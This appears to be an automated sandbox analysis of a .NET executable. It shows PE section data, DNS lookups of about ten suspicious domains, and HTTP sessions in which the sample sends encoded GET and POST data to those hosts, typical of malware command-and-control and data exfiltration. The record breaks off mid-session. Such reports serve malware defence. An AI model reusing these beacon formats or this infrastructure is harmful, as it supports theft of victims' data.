IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xf6e9c0xf700011dc5da3465ecb303eac6151e951df7bFalse0.6975591868041497data6.961995643853877IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xfa0000x5c40x600eaa7273cbfff6e3f7ef16ccf8d01cfd9False0.4303385416666667data4.122035258241266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xfc0000xc0x2003e4cd5e672f56d993c9158d0ddc068beFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_VERSION0xfa0900x334data0.4378048780487805
                                                                  RT_MANIFEST0xfa3d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain
                                                                  Jan 11, 2025 01:22:45.817106962 CET8050001104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:46.352767944 CET8050001104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:46.353579998 CET8050001104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:46.353677988 CET5000180192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:47.320638895 CET5000180192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:48.383436918 CET5000280192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:48.388339043 CET8050002104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:48.388469934 CET5000280192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:48.530961037 CET5000280192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:48.535890102 CET8050002104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:48.948179007 CET8050002104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:48.948985100 CET8050002104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:48.949043036 CET5000280192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:48.949172020 CET8050002104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:48.949233055 CET5000280192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:50.039079905 CET5000280192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:51.065989017 CET5000380192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:51.070898056 CET8050003104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:51.071021080 CET5000380192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:51.160696030 CET5000380192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:51.165539980 CET8050003104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:51.165669918 CET8050003104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:51.624514103 CET8050003104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:51.624869108 CET8050003104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:51.624941111 CET5000380192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:52.679763079 CET5000380192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:53.698369980 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:53.703269958 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:53.703357935 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:53.713139057 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:53.718031883 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253364086 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253432035 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253469944 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253499985 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:54.253506899 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253544092 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253556013 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:54.253580093 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253617048 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253652096 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253655910 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:54.253690004 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253694057 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:54.253727913 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253770113 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:54.253839970 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:54.253994942 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:54.258445024 CET5000480192.168.2.5104.21.15.100
                                                                  Jan 11, 2025 01:22:54.267621994 CET8050004104.21.15.100192.168.2.5
                                                                  Jan 11, 2025 01:22:59.290746927 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:22:59.295653105 CET805000546.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:22:59.295790911 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:22:59.310364008 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:22:59.315274954 CET805000546.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:00.101434946 CET805000546.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:00.101542950 CET805000546.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:00.101751089 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:00.820380926 CET5000580192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:01.839936972 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:02.825125933 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:02.825244904 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:02.839405060 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:02.845922947 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:03.649169922 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:03.649401903 CET805000646.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:03.649452925 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:04.351871967 CET5000680192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.370197058 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.375649929 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:05.375756979 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.390223026 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:05.395090103 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:05.395349026 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:06.191010952 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:06.191226006 CET805000746.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:06.191304922 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:06.898415089 CET5000780192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.917834997 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.922936916 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:07.923597097 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.933021069 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:07.937968969 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:08.749007940 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:08.749219894 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:08.749322891 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:08.752022982 CET5000880192.168.2.546.253.5.221
                                                                  Jan 11, 2025 01:23:08.756853104 CET805000846.253.5.221192.168.2.5
                                                                  Jan 11, 2025 01:23:14.241512060 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:14.246409893 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.246529102 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:14.262600899 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:14.267492056 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.813241005 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.813318968 CET8050009107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:14.813376904 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:15.773415089 CET5000980192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.792418957 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.797457933 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:16.797550917 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.812992096 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:16.817886114 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:17.364053965 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:17.364094973 CET8050010107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:17.364166975 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:18.320481062 CET5001080192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.339431047 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.344374895 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.344512939 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.357899904 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:19.362817049 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.362987041 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.915699959 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.915754080 CET8050011107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:19.915817022 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:20.867280960 CET5001180192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.886311054 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.891258001 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:21.891388893 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.900738955 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:21.905608892 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:22.454224110 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:22.454288006 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:22.454500914 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:22.457580090 CET5001280192.168.2.5107.167.84.42
                                                                  Jan 11, 2025 01:23:22.462512016 CET8050012107.167.84.42192.168.2.5
                                                                  Jan 11, 2025 01:23:27.490089893 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:27.495019913 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:27.495626926 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:27.510284901 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:27.515237093 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:28.090332985 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:28.090382099 CET8050013209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:28.090531111 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:29.032094002 CET5001380192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.043298960 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.048155069 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.048310995 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.067981958 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:30.072737932 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.651897907 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.652019024 CET8050014209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:30.652089119 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:31.570388079 CET5001480192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.590054035 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.595004082 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:32.595647097 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.615881920 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:32.620713949 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:32.620851994 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:33.179502010 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:33.179527044 CET8050015209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:33.179816008 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:34.132819891 CET5001580192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.151714087 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.156582117 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.156723022 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.165673971 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.170502901 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.767946959 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.768054962 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:35.768253088 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.770869970 CET5001680192.168.2.5209.74.77.109
                                                                  Jan 11, 2025 01:23:35.775671005 CET8050016209.74.77.109192.168.2.5
                                                                  Jan 11, 2025 01:23:40.848118067 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:40.853387117 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:40.853502035 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:40.868402004 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:40.873229980 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311642885 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311676979 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311695099 CET8050017199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:41.311917067 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:42.382868052 CET5001780192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.401658058 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.406465054 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.406595945 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.421920061 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.426794052 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896306038 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896328926 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896352053 CET8050018199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:43.896435976 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:43.896481991 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:44.929687977 CET5001880192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.949130058 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.954070091 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:45.954185963 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.970124006 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:45.975002050 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:45.975241899 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408795118 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408843040 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408876896 CET8050019199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:46.408936024 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:46.408984900 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:47.806957960 CET5001980192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.823862076 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.828711987 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:48.831653118 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.840531111 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:48.845371008 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286252975 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286289930 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286324024 CET8050020199.59.243.228192.168.2.5
                                                                  Jan 11, 2025 01:23:49.286428928 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:49.286473036 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:49.289197922 CET5002080192.168.2.5199.59.243.228
                                                                  Jan 11, 2025 01:23:49.293976068 CET8050020199.59.243.228192.168.2.5
                                                                  TimestampSource PortDest PortSource IPDest IP
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 11, 2025 01:21:34.800252914 CET | 192.168.2.5 | 1.1.1.1 | 0xe9fd | Standard query (0) | www.bpgroup.site | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:21:51.183574915 CET | 192.168.2.5 | 1.1.1.1 | 0x35f1 | Standard query (0) | www.bookingservice.center | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:04.636359930 CET | 192.168.2.5 | 1.1.1.1 | 0x10ec | Standard query (0) | www.tempatmudisini06.click | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:18.636547089 CET | 192.168.2.5 | 1.1.1.1 | 0x5915 | Standard query (0) | www.hm35s.top | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:32.199526072 CET | 192.168.2.5 | 1.1.1.1 | 0xada1 | Standard query (0) | www.snehasfashion.shop | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:45.777513027 CET | 192.168.2.5 | 1.1.1.1 | 0x1139 | Standard query (0) | www.sitioseguro.blog | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:59.277549982 CET | 192.168.2.5 | 1.1.1.1 | 0x2d1d | Standard query (0) | www.windsky.click | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:23:13.761678934 CET | 192.168.2.5 | 1.1.1.1 | 0xe183 | Standard query (0) | www.cssa.auction | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:23:27.465123892 CET | 192.168.2.5 | 1.1.1.1 | 0x3556 | Standard query (0) | www.moviebuff.info | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:23:40.777350903 CET | 192.168.2.5 | 1.1.1.1 | 0x7653 | Standard query (0) | www.whisperart.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 11, 2025 01:21:35.289105892 CET | 1.1.1.1 | 192.168.2.5 | 0xe9fd | No error (0) | www.bpgroup.site | bpgroup.site | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 01:21:35.289105892 CET | 1.1.1.1 | 192.168.2.5 | 0xe9fd | No error (0) | bpgroup.site | | 74.48.143.82 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:21:51.442398071 CET | 1.1.1.1 | 192.168.2.5 | 0x35f1 | No error (0) | www.bookingservice.center | | 98.124.224.17 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:04.897944927 CET | 1.1.1.1 | 192.168.2.5 | 0x10ec | No error (0) | www.tempatmudisini06.click | tempatmudisini06.click | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 01:22:04.897944927 CET | 1.1.1.1 | 192.168.2.5 | 0x10ec | No error (0) | tempatmudisini06.click | | 103.21.221.4 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:18.647919893 CET | 1.1.1.1 | 192.168.2.5 | 0x5915 | No error (0) | www.hm35s.top | hm35s.top | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 01:22:18.647919893 CET | 1.1.1.1 | 192.168.2.5 | 0x5915 | No error (0) | hm35s.top | | 154.23.184.95 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:32.251811028 CET | 1.1.1.1 | 192.168.2.5 | 0xada1 | No error (0) | www.snehasfashion.shop | snehasfashion.shop | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 01:22:32.251811028 CET | 1.1.1.1 | 192.168.2.5 | 0xada1 | No error (0) | snehasfashion.shop | | 88.198.8.150 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:45.788909912 CET | 1.1.1.1 | 192.168.2.5 | 0x1139 | No error (0) | www.sitioseguro.blog | | 104.21.15.100 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:45.788909912 CET | 1.1.1.1 | 192.168.2.5 | 0x1139 | No error (0) | www.sitioseguro.blog | | 172.67.162.39 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:22:59.288147926 CET | 1.1.1.1 | 192.168.2.5 | 0x2d1d | No error (0) | www.windsky.click | | 46.253.5.221 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:23:14.238646984 CET | 1.1.1.1 | 192.168.2.5 | 0xe183 | No error (0) | www.cssa.auction | cssa.auction | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 11, 2025 01:23:14.238646984 CET | 1.1.1.1 | 192.168.2.5 | 0xe183 | No error (0) | cssa.auction | | 107.167.84.42 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:23:27.487436056 CET | 1.1.1.1 | 192.168.2.5 | 0x3556 | No error (0) | www.moviebuff.info | | 209.74.77.109 | A (IP address) | IN (0x0001) | false |
| Jan 11, 2025 01:23:40.845293999 CET | 1.1.1.1 | 192.168.2.5 | 0x7653 | No error (0) | www.whisperart.net | | 199.59.243.228 | A (IP address) | IN (0x0001) | false |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49926 | 74.48.143.82 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:21:35.589922905 CET | 433 | OUT | GET /p8wp/?e6sH8=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnkRY0wlRdLQOsYcJNWRSxCeXfXL0akVDuIK46RTRxpICeg==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.bpgroup.site
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
Jan 11, 2025 01:21:36.132858992 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Sat, 11 Jan 2025 00:21:36 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 01:21:36.132875919 CET | 253 | IN
                                                                  Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49983 | 98.124.224.17 | 80 | 1240 | C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 01:21:51.465203047 CET | 719 | OUT | POST /47f1/ HTTP/1.1
                                                                  Host: www.bookingservice.center
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.bookingservice.center
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.bookingservice.center/47f1/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Ascii: e6sH8=MMfsStaAwy1DiXTSkGSV3ugOr/poGLCoyvuVSqHUH5KnRY4J9vc5C0ggo4PwXXx/Q//A76HBMfVhGpE0DCt15VIIsHY8/QSw+JMRZ0xcOCVcmpcr9k9CDUEfcoa9lYWPxXjQz61dTiWsiW/1JtHsrdsDqVBdwKmDXqsfGaZeqBZPvAkYkcX9MFiZHoQFAU4McqmSkpo=
Jan 11, 2025 01:21:51.981910944 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Content-Type: text/html
                                                                  Server: Microsoft-IIS/10.0
                                                                  X-Powered-By: ASP.NET
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Date: Sat, 11 Jan 2025 00:21:51 GMT
                                                                  Connection: close
                                                                  Content-Length: 1245
